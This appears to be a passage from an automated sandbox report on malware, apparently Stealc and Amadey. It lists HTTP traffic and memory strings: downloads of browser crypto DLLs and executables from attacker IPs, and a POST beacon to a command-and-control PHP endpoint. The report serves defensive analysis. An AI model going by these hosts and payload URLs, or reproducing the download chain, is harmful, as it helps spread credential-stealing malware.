                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81If-Modified-Since: Thu, 04 Jul 2024 23:59:33 GMTIf-None-Match: "66873765-26d400"
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: unknownHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exe
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exe00
                        Source: 586ef238b2.exe, 0000000F.00000002.3328030922.000000000034A000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exeData
                        Source: 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exe
                        Source: 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exe.phpefoxx
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exe00
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exea
                        Source: explorti.exe, 00000003.00000002.4096195243.000000000149F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/stealc/random.exe
                        Source: explorti.exe, 00000003.00000002.4096195243.000000000149F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/stealc/random.exeH
                        Source: explorti.exe, 00000003.00000002.4096195243.0000000001504000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000003.00000002.4096195243.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php(9
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php3693405117-2476756634-1002
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php3R~
                        Source: explorti.exe, 00000003.00000002.4096195243.0000000001488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php=
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpGRJ
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpIR
                        Source: explorti.exe, 00000003.00000002.4096195243.000000000144A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpQ
                        Source: explorti.exe, 00000003.00000003.2038792093.0000000001502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpR&
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpT9x-%
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpaR(
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpkR&
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpmespace
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001EDE000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.000000000172E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/freebl3.dll
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/freebl3.dll=
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1962741464.0000000001F47000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dll
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/msvcp140.dll
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/msvcp140.dll.s/
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/msvcp140.dllvs
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dll;W
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dllk
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dlls
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dllzW
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dll
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dllVr7
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dllq
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/sqlite3.dll
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/sqlite3.dllK
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll3
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/920475a59bac849d.php
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/920475a59bac849d.phpW
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: 37664d9843.exe, 00000004.00000000.1782374348.00000000016B9000.00000080.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000002.1957654994.0000000001413000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000933000.00000040.00000001.01000000.0000000F.sdmp, 586ef238b2.exe, 0000000F.00000000.3140997068.0000000000BD9000.00000080.00000001.01000000.0000000F.sdmp, 37664d9843.exe.3.dr, random[1].exe.3.dr, 586ef238b2.exe.3.drString found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
                        Source: 37664d9843.exe, 00000004.00000000.1782374348.00000000016B9000.00000080.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000002.1957654994.0000000001413000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000933000.00000040.00000001.01000000.0000000F.sdmp, 586ef238b2.exe, 0000000F.00000000.3140997068.0000000000BD9000.00000080.00000001.01000000.0000000F.sdmp, 37664d9843.exe.3.dr, random[1].exe.3.dr, 586ef238b2.exe.3.drString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
                        Source: 37664d9843.exe, 00000004.00000000.1782374348.00000000016B9000.00000080.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000002.1957654994.0000000001413000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000933000.00000040.00000001.01000000.0000000F.sdmp, 586ef238b2.exe, 0000000F.00000000.3140997068.0000000000BD9000.00000080.00000001.01000000.0000000F.sdmp, 37664d9843.exe.3.dr, random[1].exe.3.dr, 586ef238b2.exe.3.drString found in binary or memory: http://pki-ocsp.symauth.com0
                        Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, 586ef238b2.exe, 0000000F.00000002.3360531136.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, mozglue.dll.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: 37664d9843.exe, 00000004.00000002.1984219482.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360382541.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: 37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                        Source: 37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ep
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.epnacl
                        Source: 37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: 37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: 37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: 37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: 37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: ECBGCGCGIEGCBFHIIEBF.4.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: https://mozilla.org0/
                        Source: EBGIDGCAFCBKECAAKJJKJEHDGC.15.drString found in binary or memory: https://support.mozilla.org
                        Source: EBGIDGCAFCBKECAAKJJKJEHDGC.15.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: EBGIDGCAFCBKECAAKJJKJEHDGC.15.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000003.1839531742.000000002385D000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000248000.00000040.00000001.01000000.0000000F.sdmp, 586ef238b2.exe, 0000000F.00000003.3202674791.0000000022D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000248000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000003.1839531742.000000002385D000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000248000.00000040.00000001.01000000.0000000F.sdmp, 586ef238b2.exe, 0000000F.00000003.3202674791.0000000022D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000248000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
